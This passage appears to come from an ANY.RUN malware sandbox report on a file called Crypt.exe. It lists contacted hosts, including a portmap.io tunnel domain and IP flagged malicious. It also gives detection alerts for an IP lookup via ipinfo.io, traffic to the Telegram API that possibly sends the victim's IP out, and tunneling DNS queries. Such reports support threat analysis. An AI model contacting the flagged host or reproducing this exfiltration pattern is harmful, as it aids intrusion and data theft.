  • 192.124.249.24
  • 192.124.249.23
  • 192.124.249.41
whitelisted
MatrixShell-63771.portmap.io
  • 193.161.193.99
malicious
github.com
  • 140.82.121.4
whitelisted
objects.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.110.133
  • 185.199.109.133
whitelisted

Threats

PID
Process
Class
Message
5400
not64.exe
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
5400
not64.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ipinfo.io
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
2196
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
5400
not64.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
5400
not64.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
2196
svchost.exe
Potential Corporate Privacy Violation
ET INFO DNS Query to a Reverse Proxy Service Observed
2196
svchost.exe
Misc activity
ET INFO DNS Query for Port Mapping/Tunneling Service Domain (.portmap .io)
1128
curl.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Crypt.exe